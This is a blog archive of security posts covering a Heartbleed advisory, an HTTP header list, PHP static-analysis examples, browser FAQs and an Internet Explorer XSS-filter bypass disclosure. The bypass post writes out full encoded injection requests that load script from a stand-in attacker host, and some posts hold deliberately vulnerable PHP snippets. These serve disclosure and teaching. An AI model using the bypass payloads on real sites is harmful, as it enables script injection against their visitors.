Category Archives: Tools and Applications

WhiteHat Security Observations and Advice about the Heartbleed OpenSSL Exploit

The Heartbleed SSL attack is one of the most significant, and media-covered, vulnerabilities affecting the Internet in recent years. According to Netcraft, 17.5% of SSL-enabled sites on the Internet were vulnerable to the Heartbleed SSL attack just prior to its disclosure.

The vulnerable versions of OpenSSL were first released to the public 2 years ago. The implications of 2 years of exposure to this vulnerability are significant, and we will explore that more at the end of this article. First – immediate details:

This attack does not require any MitM (Man in the Middle) or other complex setups that SSL exploits usually require. This attack can be executed directly and anonymously against any webserver/device running a vulnerable version OpenSSL, and yield a wealth of sensitive information.

WhiteHat Security’s Threat Research Center (TRC) began testing customers for vulnerability to this attack immediately, using a custom SSL-testing tool from our TRC R&D labs. Our initial conclusions were that the frequency with which sites were vulnerable to this attack was low on production applications being monitored by the WhiteHat Sentinel security service. In our first test sample, covering 18,000 applications, we found a vulnerability rate of about 2% – much lower than Netcraft’s 17.5% vulnerability rate for all SSL-enabled websites. This may be a result of a biased sample, since we only evaluated applications under Sentinel service. (This may be because application owners who use Sentinel are already more security-conscious than most.)

While the frequency of vulnerability to the Heartbleed SSL attack is low: those that are vulnerable are severely vulnerable. Everything in memory on the webserver/device running a vulnerable version of OpenSSL is exposed. This includes:

  • UserIDs
  • Passwords
  • PII (Personally Identifiable Information)
  • SSL certificate private keys (e.g.-SSL using this cert will never be private again, if compromised)
  • Any private crypto keys
  • SSL-based Chat
  • SSL-based VPN
  • SSL-based anything
  • Connection Strings (Database userIDs/Passwords) to back-end databases, mainframes, LDAP, partner systems, etc. loaded in memory
  • Additional vulnerabilities in source code, that are loaded into memory, with precise locations (e.g.-Blind SQL injection)
  • Basically any code or data in memory on the server running a vulnerable version of OpenSSL is rendered in clear-text to all attackers

The most important thing you need to know regarding the above: this attack leaves no traces. No logs. Nothing suspect. It is a nice, friendly, read-only anonymous dump of memory. This is the digital equivalent of accidentally leaving a copy of your corporate diary, with all sorts of private secrets, on the seat of the mass-transit bus for everyone to read – including strangers you will never know. Your only recourse for secrets like passwords now is the delete key.

The list of vulnerable applications published to date includes mainstream web and mobile applications, security devices with web interfaces, and critical business applications handling sensitive and federally-regulated data.

This is a seriously sub-optimal situation.

Timeline of the Heartbleed SSL attack and WhiteHat Security’s response:

April 7th: Heartbleed 0day attack published. Websites vulnerable to the attack included major websites/email services that the majority of the Internet uses daily, and many mobile applications that use OpenSSL.

April 8th: WhiteHat TRC begins testing customers’ sites for vulnerability to Heartbleed SSL exploitation. In parallel, WhiteHat R&D begins QAing new automated tests to enable Sentinel services to identify this vulnerability at scale.

April 9th: WhiteHat TRC identifies roughly 350 websites vulnerable to Heartbleed SSL attack, out of initial sample of 18,000 production applications. We find an initial 1.9% average exploitability but this percentage appears to drop rapidly in the next 48 hours.

April 10th: WhiteHat R&D releases new Sentinel Heartbleed SSL vulnerability tests, enabling Sentinel to automatically identify if any applications under Sentinel service are vulnerable to Heartbleed SSL attacks with every scan. This brings test coverage to over 35,000 applications. Average vulnerability rate drops to below 1% by EOD April 10th.

Analysis: the more applications we scan using the new Heartbleed SSL attack tests, the fewer sites (by percent) we find vulnerable to this attack. We suspect this is because most customers have moved quickly to patch this vulnerability, due to the extreme severity of the vulnerability and the intense media coverage of the issue.

Speculation: we suspect that this issue will quickly disappear for most important SSL-enabled applications on the Internet – especially applications under some type of active DAST or SAST scanning service. It will likely linger on with small sites hosted by providers that do not offer (or pay attention to) any form of security patching service.

We also expect this issue to persist with internal (non-Internet-facing) applications and devices that use SSL, but which are commonly not tested or monitored by tools or services capable of detecting this vulnerability, and that are less frequently upgraded.

While the attack surface of internal network applications & devices may appear to be much smaller than Internet-facing applications, simple one-click exploits are already available on the Internet, usable by anyone on your network with access to a web browser. (link to exploit code: http://samiux.blogspot.com/2014/04/exploit-dev-heartbleed-cve-2014-0160.html)

This means that any internal user on your network who downloads one of these exploits is capable of extracting everything in memory from any device or application on your internal network that is vulnerable. This includes:

  • Internal routers and switches
  • Firewalls and IDS systems
  • Human Resources applications
  • Finance and payroll applications
  • Pretty much any application or device running a vulnerable version of OpenSSL
  • Agents exploiting internal devices will see all network traffic or application data in memory on the affected device/application

Due to the fact that most of these internal applications and devices lack the type of logging and alerting that would notify Information Security teams of active abuse of this vulnerability, our concern is that in coming months these internal devices & applications may provide rich grounds for exploitation that may never be discovered.

Conclusion & Recommendations:
The scope, impact, and ease-of-exploitation of this vulnerability make it one of the worst in Internet history. However, patches are readily available for most systems, and the impact risk of patching seems minimal. It appears most of our customers have already patched the majority of their Internet-facing systems against this exploit.

However, this vulnerability has existed for up to 2 years in OpenSSL implementations. We will likely never know if anyone has been actively exploiting this vulnerability, due to difficultly in logging/tracking attacks. If your organization is concerned about this, we recommend that — in addition to patching this vulnerability — SSL certificates of suspect systems be revoked and re-issued. We also recommend that all end-user passwords and system passwords be changed on suspect systems.

Is this vulnerability a “boy that cried wolf” hype situation? Bruce Schneier has another interesting perspective on this: https://www.schneier.com/blog/archives/2014/04/heartbleed.html.

WhiteHat will continue to share more information about this vulnerability as further information becomes available.

General reference material:
https://blog.whitehatsec.com/heartbleed-openssl-vulnerability/
https://www.schneier.com/blog/archives/2014/04/heartbleed.html/

Vulnerability details:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160

Exploit details:
http://samiux.blogspot.com/2014/04/exploit-dev-heartbleed-cve-2014-0160.html

Summaries:
http://business.kaspersky.com/the-heart-is-bleeding-out-a-new-critical-bug-found-in-openssl/
http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html

Adding Open Source Framework Hardening to Your SDLC – Podcast

I talk with G.S. McNamara, Federal Information Security Senior Consultant, about fixing open source framework vulnerabilities, what to consider when pushing open source, how to implement a system around patches without impacting performance, and security considerations on framework selections.





Want to do a podcast with us? Signup to be part of our Unsung Hero program.

About our “Unsung Hero Program”
Every day app sec professionals tirelessly protect the Web, and we recognize that this is largely owed to a series of small victories. These represent untold stories. We want to help share your story. To learn more click here.

List of HTTP Response Headers

Every few months I find myself looking up up the syntax of a relatively obscure HTTP header. Regularly I find myself wondering why there isn’t a good definitive list of common HTTP Response headers anywhere. Usually the lists on the Internet are missing half a dozen HTTP headers. So I’ve taken care to gather a list all of the HTTP response headers I could find. Hopefully this is useful to you, and removes some of the mystique behind how HTTP works if you’ve never seen headers before.

Note: this does not include things like IncapIP or other proxy/service specific headers that aren’t standard, and nor does it include request headers.

Header Example Value Notes
Access-Control-Allow-Credentials true
Access-Control-Allow-Headers X-PINGOTHER
Access-Control-Allow-Methods PUT, DELETE, XMODIFY
Access-Control-Allow-Origin http://example.org
Access-Control-Expose-Headers X-My-Custom-Header, X-Another-Custom-Header
Access-Control-Max-Age 2520
Accept-Ranges bytes
Age 12
Allow GET, HEAD, POST, OPTIONS Commonly includes other things, like PROPFIND etc…
Alternate-Protocol 443:npn-spdy/2,443:npn-spdy/2
Cache-Control private, no-cache, must-revalidate
Client-Date Tue, 27 Jan 2009 18:17:30 GMT
Client-Peer 123.123.123.123:80
Client-Response-Num 1
Connection Keep-Alive
Content-Disposition attachment; filename=”example.exe”
Content-Encoding gzip
Content-Language en
Content-Length 1329
Content-Location /index.htm
Content-MD5 Q2hlY2sgSW50ZWdyaXR5IQ==
Content-Range bytes 21010-47021/47022
Content-Security-Policy, X-Content-Security-Policy, X-WebKit-CSP default-src ‘self’ Different header needed to control different browsers
Content-Security-Policy-Report-Only default-src ‘self’; …; report-uri /csp_report_parser;
Content-Type text/html Can also include charset information (E.g.: text/html;charset=ISO-8859-1)
Date Fri, 22 Jan 2010 04:00:00 GMT
ETag “737060cd8c284d8af7ad3082f209582d”
Expires Mon, 26 Jul 1997 05:00:00 GMT
HTTP /1.1 401 Unauthorized Special header, no colon space delimiter
Keep-Alive timeout=3, max=87
Last-Modified Tue, 15 Nov 1994 12:45:26 +0000
Link <http://www.example.com/>; rel=”cononical” rel=”alternate”
Location http://www.example.com/
P3P policyref=”http://www.example.com/w3c/p3p.xml”, CP=”NOI DSP COR ADMa OUR NOR STA”
Pragma no-cache
Proxy-Authenticate Basic
Proxy-Connection Keep-Alive
Refresh 5; url=http://www.example.com/
Retry-After 120
Server Apache
Set-Cookie test=1; domain=example.com; path=/; expires=Tue, 01-Oct-2013 19:16:48 GMT Can also include the secure and HTTPOnly flag
Status 200 OK
Strict-Transport-Security max-age=16070400; includeSubDomains
Timing-Allow-Origin www.example.com
Trailer Max-Forwards
Transfer-Encoding chunked compress, deflate, gzip, identity
Upgrade HTTP/2.0, SHTTP/1.3, IRC/6.9, RTA/x11
Vary *
Via 1.0 fred, 1.1 example.com (Apache/1.1)
Warning Warning: 199 Miscellaneous warning
WWW-Authenticate Basic
X-Aspnet-Version 2.0.50727
X-Content-Type-Options nosniff
X-Frame-Options deny
X-Permitted-Cross-Domain-Policies master-only Used by Adobe Flash
X-Pingback http://www.example.com/pingback/xmlrpc
X-Powered-By PHP/5.4.0
X-Robots-Tag noindex,nofollow
X-UA-Compatible Chome=1
X-XSS-Protection 1; mode=block

If I’ve missed any response headers, please let us know by leaving a comment and I’ll add it into the list. Perhaps at some point I’ll create a similar list for Request headers, if people find this helpful enough.

Bypassing Internet Explorer’s Anti-Cross Site Scripting Filter

There’s a problem with the reflective Cross Site Scripting ("XSS") filter in Microsoft’s Internet Explorer family of browsers that extends from version 8.0 (where the filter first debuted) through the most current version, 11.0, released in mid-October for Windows 8.1, and early November for Windows 7.

In the simplest possible terms, the problem is that the anti-XSS filter only compares the untrusted request from the user and the response body from the website for reflections that could cause immediate JavaScript or VBScript code execution. Should an injection from that initial request reflect on the page not cause immediate JavaScript code execution, that untrusted data from the injection is then marked as trusted data, and the anti-XSS filter will not check it in future requests.

To reiterate: Internet Explorer’s anti-XSS filter divides the data it sees into two categories: untrusted and trusted. Untrusted data is subject to the anti-XSS filter, while trusted data is not.

As an example, let’s suppose a website contains an iframe definition where an injection on the "xss" parameter reflects in the src="" attribute. The page referenced in the src="" attribute contains an XSS vulnerability such that:

GET http://vulnerable-iframe/inject?xss=%3Ctest-injection%3E

results in the “xss” parameter being reflected in the page containing the iframe as:

<iframe src="http://vulnerable-page/?vulnparam=<test-injection>"></iframe>

and the vulnerable page would then render as:

Some text <test-injection> some more text

Should a user make a request directly to the vulnerable page in an attempt to reflect <script src=http://attacker/evil.js></script> as follows:

GET http://vulnerable-page/?vulnparam=%3Cscript%20src%3Dhttp%3A%2F%2Fattacker%2Fevil%2Ejs%3E%3C%2Fscript%3E

Internet Explorer’s anti-XSS filter sees that the injection would result in immediate JavaScript code execution and subsequently modifies the response body to prevent that from occurring.

Even when the request is made to the page containing the iframe as follows:

GET http://vulnerable-iframe/inject?xss=%3Cscript%20src%3Dhttp%3A%2F%2Fattacker%2Fevil%2Ejs%3E%3C%2Fscript%3E

and Internet Explorer’s anti-XSS filter sees it reflected as:

<iframe src="http://vulnerable-page/?vulnparam=<script src=http://attacker/evil.js></script>"></iframe>

which, because it looks like it might cause immediate JavaScript code execution, will also be altered.

To get around the anti-XSS filter in Internet Explorer, an attacker can make use of sections of the HTML standard: Decimal encodings and Hexadecimal encodings.

Hexadecimal encodings were made part of the official HTML standard in 1998 as part of HTML 4.0 (3.2.3: Character references), while Decimal encodings go back further to the first official HTML standard in HTML 2.0 in 1995 (ISO Latin 1 Character Set). When a browser sees a properly encoded decimal or hexadecimal character in the response body of a HTTP request, the browser will automatically decode and display for the user the character referenced by the encoding.

As an added bonus for an attacker, when a decimal or hexadecimal encoded character is returned in an attribute that is then included in a subsequent request, it is the decoded character that is sent, not the decimal or hexadecimal encoding of that character.

Thus, all an attacker needs to do is fool Internet Explorer’s anti-XSS filter by inducing some of the desired characters to be reflected as their decimal or hexadecimal encodings in an attribute.

To return to the iframe example, instead of the obviously malicious injection, a slightly modified injection will be used:

Partial Decimal Encoding:
GET http://vulnerable-iframe/inject?xss=%3Cs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%20s%26%23114%3B%26%2399%3B%3Dht%26%23116%3Bp%3A%2F%2Fa%26%23116%3Bta%26%2399%3Bker%2Fevil%2Ejs%3E%3C%2Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%3E

which reflects as:

<iframe src="http://vulnerable-page/?vulnparam=<s&#99;&#114;i&#112;t s&#114;&#99;=ht&#116;p://a&#116;ta&#99;ker/evil.js></s&#99;&#114;i&#112;t>"></iframe>

or

Partial Hexadecimal Encoding:
GET http://vulnerable-iframe/inject?xss=%3Cs%26%23x63%3Bri%26%23x70%3Bt%20s%26%23x72%3Bc%3Dhttp%3A%2F%2Fatta%26%23x63%3Bker%2Fevil%2Ejs%3E%3C%2Fs%26%23x63%3Bri%26%23x70%3Bt%3E

which reflects as:

<iframe src="http://vulnerable-page/?vulnparam=<s&#x63;ri&#x70;t s&#x72;c=http://atta&#x63;ker/evil.js></s&#x63;ri&#x70;t>"></iframe>

Internet Explorer’s anti-XSS filter does not see either of those injections as potentially malicious, and the reflections of the untrusted data in the initial request are marked as trusted data and will not be subject to future filtering.

The browser, however, sees those injections, and will decode them before including them in the automatically generated request for the vulnerable page. So when the following request is made from the iframe definition:

GET http://vulnerable-page/?vulnparam=%3Cscript%20src%3Dhttp%3A%2F%2Fattacker%2Fevil%2Ejs%3E%3C%2Fscript%3E

Internet Explorer’s anti-XSS filter will ignore the request completely, allowing it to reflect on the vulnerable page as:

Some text <script src=http://attacker/evil.js></script> some more text

Unfortunately (or fortunately, depending on your point of view), this methodology is not limited to iframes. Any place where an injection lands in the attribute space of an HTML element, which is then relayed onto a vulnerable page on the same domain, can be used. Form submissions where the injection reflects either inside the "action" attribute of the form element or in the "value" attribute of an input element are two other instances that may be used in the same manner as with the iframe example above.

Beyond that, in cases where there is only the single page where:

GET http://vulnerable-page/?xss=%3Ctest-injection%3E

reflects as:

Some text <test-injection> some more text

the often under-appreciated sibling of Cross Site Scripting, Content Spoofing, can be utilized to perform the same attack. In this example, an attacker would craft a link that would reflect on the page as:

Some text <div style=some-css-elements><a href=?xss=&#x3C;s&#x63;ri&#x70;t&#x20;s&#x72;c&#x3D;htt&#x70;://atta&#x63;ker/evil.js&#x3E;&#x3C;/s&#x63;ri&#x70;t&#x3E;>Requested page has moved here</a></div> some more text

Then when the victim clicks the link, the same page is called, but now with the injection being fully decoded:

Some text <script src=http://attacker/evil.js></script> some more text

This is the flaw in Internet Explorer’s anti-XSS filter. It only looks for injections that might immediately result in JavaScript code execution. Should an attacker find a way to relay the injection within the same domain — be it by frames/iframes, form submissions, embedded links, or some other method — the untrusted data injected in the initial request will be treated as trusted data in subsequent requests, completely bypassing Internet Explorer’s anti-Cross Site Scripting filter.

Afterword: >

After Microsoft made its decision not to work on a fix for this issue, it was requested that the following link to their design philosophy blog post be included in any public disclosures that may occur. In particular the third category, which discusses "application-specific transformations" and the possibility of an application that would "ROT13 decode" values before reflecting them, was pointed to in Microsoft’s decision to allow this flaw to continue to exist.

http://blogs.msdn.com/b/dross/archive/2008/07/03/ie8-xss-filter-design-philosophy-in-depth.aspx

The "ROT13 decode" and "application-specific transformations" mentions do not apply. Everything noted above is part of the official HTML standard, and has been so since at least 1998 — if not earlier. There is no "only appears in this one type of application" functionality being used. The XSS injection reflects in the attribute space of an element and is then relayed onto a vulnerable page (either another page, or back to itself) where it then executes.

Additionally, the usage of decimal and hexadecimal encodings are not the flaw, but rather two implementations that make use of the method that exploits the flaw. Often simple URL/URI-encodings (mentioned as early as 1994 in RFC 1630) can be used in their place.

The flaw with Internet Explorer’s anti-XSS filter is that injected untrusted data can be turned into trusted data and that injected trusted data is not subject to validation by Internet Explorer’s anti-XSS filter.

Post Script:

The author has adapted this post from his original work, which can be found here:

http://rtwaysea.net/blog/blog-2013-10-18-long.html

Announcing Support for PHP in WhiteHat Sentinel Source

It is with great pleasure that I formally announce support for the PHP programming language in WhiteHat Sentinel Source! Joining Java and CSharp, PHP is now a member of the family of languages supported by our static code analysis technology. Effective immediately, our users have the ability to start scheduling static analysis scans of web applications developed in PHP for security vulnerabilities. Accurately and efficiently supporting the PHP language was a tremendous engineering effort; a great reflection upon our Engine and Research and Development teams.

Static code analysis for security of the PHP programming language is nothing new. There are open source and commercial vendors already claiming support for this language and have done so for quite some time now. So what’s so special about the support for PHP in WhiteHat Sentinel Source? The answer centers on our advancement in the ability for static analysis to model and simulate the execution of PHP accurately. Almost every other PHP static code analysis offering is limited by the fact that it cannot overcome the unique challenges presented by dynamic programming languages, such as dynamic typing. With an inability to accurately model type information associated with expressions and statements, for example, users were unable to correctly capture rules needed to identify security vulnerabilities. WhiteHat Sentinel Source’s PHP offering ships with a highly tuned type inference system that piggy-backs off our patented Runtime Simulation algorithm to provide much deeper insight into source code – thereby overcoming the limitations of previous technologies.

Here is a classic PHP vulnerability that most, if not all, static code analysis tools should identify as a Cross-Site Scripting vulnerability:


$unsafe_variable = $_GET['user_input'];

echo "You searched for:<strong>".$unsafe_variable."</strong>";

This code retrieves untrusted data from the HTTP request, concatenates that input with string literals, and finally echoes that dynamically constructed content out to the HTML page. Writing static code analysis rules for any engine capable of data flow analysis is fairly straight forward… the return value of the _GET field access is a source of untrusted data and the first argument to the echo function invocation is a sink. Why is this easy to capture? Well… the signatures for the data types represented in the rules are incredibly simple. For example, the signature for the echo method is “echo(object)” where “echo” is the function name and “(object)” indicates that it accepts one argument whose data type is unknown. We assume all parameter types are the type ‘object’ to keep things simple; we cannot possibly know all parameter types for all function invocations without performing more rich analysis. Static analysis tools all have their own unique way of capturing security rules using a custom language. To keep discussions about static analysis security rules vendor agnostic, we will only be discussing rule writing and rule matching at the code signature level. Let’s agree on the format of [class name]->[function name]([one or more parameters]).

Let’s make this a little more interesting. Consider the following PHP code snippet that may or may not be indicative of a SQL Injection vulnerability:



$anonymous = new Anonymous ();

$anonymous->runQuery($_GET['name']);


This code instantiates a class called “Anonymous” and invokes the “runQuery” method of that class using unstrusted data from the HTTP request. Is this vulnerable to SQL Injection? Well – it depends on what runQuery does. Let’s assume that the Anonymous class is part of a 3rd party library for which we do not have the source or for which we simply do not want to include in the scan. Let’s also assume that we know runQuery dynamically generates and executes SQL queries and is thus considered a sink. Based on these assumptions, a manual code review would clearly indicate that yes, this is vulnerable to SQL Injection. But how would we do this with static analysis? Here’s where it gets tricky…

We want to mark the “runQuery” method of the “Anonymous” type as a sink for SQL commands such that if untrusted data is used as an argument to this method, then we have SQL Injection. The problem is we need to not only capture information about the “runQuery” in our sink rule, but we must also capture the fact that it is associated with the “Anonymous” class. The code signature that must be reflected in the security rule would look as follows: Anonymous->runQuery(object).

Unfortunately, basic forms of static analysis are unable to determine with reasonable confidence that $anonymous variable is of type Anonymous – in fact $anonymous could be of any type! As a result, the underlying engine is never able to match the security rule to the $anonymous->runQuery($_GET['name']) statement resulting in a lost vulnerability.

How does WhiteHat Sentinel Source’s PHP offering overcome this problem? it’s simple… in theory. When the engine first runs, it builds a model of the source code and attempts to compare the date sink rule against the $anonymous->runQuery($_GET['name']) method invocation. At this point, the only information we have about this statement is the method name and number of arguments producing a code signature as follows: ?->runQuery(object). Compare this signature to the signature represented in our sink rule: Anonymous->runQuery(object). Since we cannot know the type of the $anonymous variable at this point, we perform a partial match such that we only compare the method name and arguments to those captured in the security rule. Since the statement’s signature is a partial match to our rule’s signature, we mark the model as such and move on.

After processing all our security rules, the static code analysis engine will begin performing data flow analysis on top of our patented Runtime Simulation algorithm looking for security vulnerabilities. The engine will first see the expression “$anonymous = new Anonymous();” and actually record the fact that the $anonymous variable, at any point in the future, may be of type “Anonymous”. Next, the engine will hit the following statement “$anonymous->runQuery($_GET['name']);”. This statement was previously marked with a SQL Injection sink via a partial match. We now have more information about the $anonymous variable and now check if it is a full match with the original security rule. The statement’s signature is now known to be: Anonymous->runQuery(object) which fully matches the signature represented by the sink security rule. With a full match realized, the engine treats this statement as a sink and flags the SQL Injection vulnerability correctly!

Ok – that was a little too easy. Let’s make this more challenging… consider the following PHP code snippet:


$anonymous = null;

if (funct_a() > funct_b()) {
     $anonymous = new Anonymous();
} elseif (funct_a() == funct_b()) {
     $anonymous = new NotSoAnonymous();
} else {
     $anonymous = new NsaAnonymous();
}

$anonymous->runQuery($_GET['name']);

What the heck does the engine do now when it sees the runQuery statement? The engine will collect all data type assignments for the $anonymous variable and use all such types in an attempt to realize a full matching for the runQuery statement. The engine will see three different possible code signatures for the statement. They are as follows:

Anonyous->runQuery(object)
NotSoAnonymous->runQuery(object)
NsaAnonymous->runQuery(object)

The engine will take these three signatures and compare to the data type found in the signature represented by the partial match security rule. Given that the first of three signatures fully matches the signature represented by the security rule, the engine will treat the statement as a sink and flag the SQL Injection vulnerability correctly!

You may be asking yourself: “what if $anonymous was of type NotSoAnonymous or NsaAnonymous? Would it still flag a vulnerability?” The answer is a resounding yes. Static analysis technologies do not, and in my opinion should not, attempt to evaluate conditionals as such practice will lead to an overwhelming number of lost vulnerabilities. Static code analysis could support trivial conditionals, such as comparing primitives, but conditionals in real-world code require much more guesswork and various forms of heuristics that ultimately lead to poor results. Even so, is it not fair to say that at some point in the application “funct_a()” will be greater than “funct_b()”? Otherwise, what is the point of the conditional in the first place? Our technology assumes all conditionals will be true at some point in time.

Remember when I said this was easy in theory? Well, this is where it starts to get really interesting: Consider the following code snippet and assume we do not have the source code available for “create_class_1()”, “create_class_2()” and “create_class_3()”:


$anonymous = null;

if (funct_a() > funct_b()) {
     $anonymous = create_class_1();
} elseif (funct_a() == funct_b()) {
     $anonymous = create_class_2();
} else {
     $anonymous = create_class_3();
}

$anonymous->runQuery($_GET['name']);

Now what is the range of possible data types for the $anonymous variable when used in the vulnerable statement? This is where we being to stress the capabilities of the security rule language itself. WhiteHat Sentinel Source solves this by allowing the security rule writer to explicitly define the data type returned from a function invocation if such data type cannot be determined based on the provided source code. For example, the security rule writer could capture a rule stating that the return value of the create_class_3() function invocation is of type Anonymous. The engine would then take this information, propagate data types as before and correctly flag the SQL Injection vulnerability associated with runQuery method invocation.

WhiteHat Sentinel Source’s type inference system allows us to perform more accurate and efficient analysis of source code in dynamically typed languages. Our type inference system not only allows us to more accurately capture security rules, but it also allows us to more accurately model control flow from method invocations of instances to method declarations of class declarations. Such capability is critical for any real world static code analysis of PHP source code.

I hope you enjoyed this rather technical and slightly lengthy blog post. It was a blast building out support for PHP and I look forward to our Sentinel Source customers benefiting from our newly available technology. Until next time…

Aviator: Some Answered Questions

We publicly released Aviator on Monday, Oct 21. Since then we’ve received an avalanche of questions, suggestions, and feature requests regarding the browser. The level of positive feedback and support has been overwhelming. Lots of great ideas and comments that will help shape where we go from here. If you have something to share, a question or concern, please contact us at aviator@whitehatsec.com.

Now let’s address some of the most often heard questions so far:

Where’s the source code to Aviator?

WhiteHat Security is still in the very early stages of Aviator’s public release and we are gathering all feedback internally. We’ll be using this feedback to prioritize where our resources will be spent. Deciding whether or not to release the source code is part of these discussions.

Aviator unitizes open source software via Chromium, don’t you have to release the source?

WhiteHat Security respects and appreciates the open source software community. We’ve long supported various open source organizations and projects throughout our history. We also know how important OSS licenses are, so we diligently studied what was required for when Aviator would be publicly available.

Chromium, of which Aviator is derived, contains a wide variety of OSS licenses. As can be seen here using aviator://credits/ in Aviator or chrome://credits/ in Google Chrome. The portions of the code we modified in Aviator are all under BSD, or BSD-like licenses. As such, publishing our changes is, strictly speaking, not a licensing requirement. This is not to say we won’t in the future, just that we’re discussing it internally first. Doing so is a big decision that shouldn’t be taken lightly. Of course, when and/if we make a change to the GPL or similar licensed software in Chromium, we’ll happily publish the updates as required.

When is Aviator going to be available for Windows, Linux, iOS, Android, etc.?

Aviator was originally an internal project designed for WhiteHat Security employees. This served as a great environment to test our theories about how a truly secure and privacy-protecting browser should work. Since WhiteHat is primarily a Mac shop, we built it for OS X. Those outside of WhiteHat wanted to use the same browser that we did, so this week we made Aviator publicly available.

We are still in the very early days of making Aviator available to the public. The feedback so far has been very positive and requests for a Windows, Linux and even open source versions are pouring in, so we are definitely determining where to focus our resources on what should come next, but there is not definite timeframe yet of when other versions will be available.

How long has WhiteHat been working on Aviator?

Browser security has been a subject of personal and professional interest for both myself, and Robert “RSnake” Hansen (Director, Product Management) for years. Both of us have discussed the risks of browser security around the world. A big part of Aviator research was spent creating something to protect WhiteHat employees and the data they are responsible for. Outside of WhiteHat many people ask us what browser we use. Individually our answer has been, “mine.” Now we can be more specific: that browser is Aviator. A browser we feel confident in using not only for our own security and privacy, but one we may confidently recommend to family and friends when asked.

Browsers have pop up blockers to deal with ads. What is different about Aviator’s approach?

Popup blockers used to work wonders, but advertisers switched to sourcing in JavaScript and actually putting content on the page. They no longer have to physically create a new window because they can take over the entire page. Using Aviator, the user’s browser doesn’t even make the connection to an advertising networks’ servers, so obnoxious or potentially dangerous ads simply don’t load.

Why isn’t the Aviator application binary signed?

During the initial phases of development we considered releasing Aviator as a Beta through the Mac Store. Browsers attempt to take advantage of the fastest method of rendering they can. These APIs are sometimes unsupported by the OS and are called “private APIs”. Apple does not support these APIs because they may change and they don’t want to be held accountable for when things break. As a result, while they allow people to use their undocumented and highly speed private APIs, they don’t allow people to distribute applications that use private APIs. We can speculate the reason being that users are likely to think it’s Apple’s fault as opposed to the program when things break. So after about a month of wrestling with it, we decided that for now, we’d avoid using the Mac Store. In the shuffle we didn’t continue signing the binaries as we had been. It was simply an oversight.

Update: November 8, 2013:
Our dev team analyzed the overly-permissive chmod settings that Aviator 1.1 shipped with. We agreed it was overly permissive and have fixed the issue to be more in line with existing browsers to protect users on multi-user systems. Click to read more on our Aviator Browser 1.2 Beta release.

Why is Aviator’s application directory world-writable?

During the development process all of our developers were on dedicated computers, not shared computers. So this was an oversight brought on by the fact that there was no need to hide data from one another and therefore chmod permissions were too lax as source files were being copied and edited. This wouldn’t have been an issue if the permissions had been changed back to their less permissive state, but it was missed. We will get it fixed in an upcoming release.

Update: November 8, 2013:
Our dev team analyzed the overly-permissive chmod settings that Aviator 1.1 shipped with. We agreed it was overly permissive and have fixed the issue to be more in line with existing browsers to protect users on multi-user systems. Click to read more on our Aviator Browser 1.2 Beta release.

Does Aviator support Chrome extensions?

Yes, all Chrome extensions should function under Aviator. If an issue comes up, please report it to aviator@whitehatsec.com so we can investigate.

Wait a minute, first you say, “if you aren’t paying you are the product,” then you offer a free browser?
Fair point. Like we’ve said, Aviator started off as an internal project simply to protect WhiteHat employees and is not an official company “product.” Those outside the company asked if they could use the same browser that we do. Aviator is our answer to that. Since we’re not in the advertising and tracking business, how could we say no? At some point in the future we’ll figure out a way to generate revenue from Aviator, but in the mean time, we’re mostly interested in offering a browser that security and privacy-conscious people want to use.

Have you gotten and feedback from the major browser vendors about Aviator? If so, what has it been?

We have not received any official feedback from any of the major browser vendors, though there has been some feedback from various employees of those vendors shared informally over Twitter. Some feedback has been positive, others negative. In either case, we’re most interested in server the everyday consumer.

Keep the questions and feedback coming and we will continue to endeavor to improve Aviator in ways that will be beneficial to the security community and to the average consumer.

What’s the Difference between Aviator and Chromium / Google Chrome?

Context:

It’s a fundamental rule of Web security: a Web browser must be able to defend itself against a hostile website. Presently, in our opinion, the market share leading browsers cannot do this adequately. This is an every day threat to personal security and privacy for the more than one billion people online, which includes us. We’ve long held and shared this point of view at WhiteHat Security. Like any sufficiently large company, we have many internal staff members who aren’t as tech savvy as WhiteHat’s Threat Research Center, so we had the same kind of security problem that the rest of the industry had: we had to rely on educating our users, because no browser on the market was suitable for our security needs. But education is a flawed approach – there are always new users and new security guidelines. So instead of engaging in a lengthy educational campaign, we began designing an internal browser that would be secure and privacy-protecting enough for our own users — by default. Over the years a great many people — friends, family members, and colleagues alike — have asked us what browser we recommend, even asked us what browser their children should use. Aviator became our answer.

Why Aviator:

The attacks a website can generate against a visiting browser are diverse and complex, but can be broadly categorized in two types. The first type of attack is designed to escape the confines of the browser walls and infect the desktop with malware. Today’s top tier browser defenses include software security in the browser core, an accompanying sandbox, URL blacklists, silent-updates, and plug-in click-to-play. Well-known browser vendors have done a great job in this regard and should be commended. No one wins when users desktops become part of a botnet.

Unfortunately, the second type of browser attack has been left largely undefended. These attacks are pernicious and carry out their exploits within the browser walls. They typically don’t implant malware, but they are indeed hazardous to online security and privacy. I’ve previously written up a lengthy 8-part blog post series on the subject documenting the problems. For a variety of reasons, these issues have not been addressed by the leading browser vendors. Rather than continue asking for updates that would likely never come, we decided we could do it ourselves.

To create Aviator we leveraged open source Chromium, the same browser core used by Google Chrome. Then, because the BSD license of Chromium allows us, we made many very particular changes to the code and configuration to enhance security and privacy. We named our product Aviator. Many people are eager to learn what exactly the differences are, so let’s go over them.

Differences:

  1. Protected Mode (Incognito Mode) / Not Protected Mode:
    TL;DR All Web history, cache, cookies, auto-complete, and local storage data is deleted after restart.
    Most people are unaware that there are 12 or more locations that websites may store cookie and cookie-like data in a browser. Cookies are typically used to track your surfing habits from one website to the next, but they also expose your online activity to nosy people with access to your computer. Protected Mode purges these storage areas automatically with each browser restart. While other browsers have this feature or something similar, it is not enabled by default, which can make it a chore to use. Aviator launches directly into Protected Mode by default and clearly indicates the mode of the current window. The security / privacy side effect of Protected Mode also helps protect against browser auto-complete hacking, login detection, and deanonymization via clickjacking by reducing the amount of session states you have open – due to an intentional lack of persistence in the browser over different sessions.
  2. Connection Control: 
    TL;DR Rules for controlling the connections made by Aviator. By default, Aviator blocks Intranet IP-addresses (RFC1918).
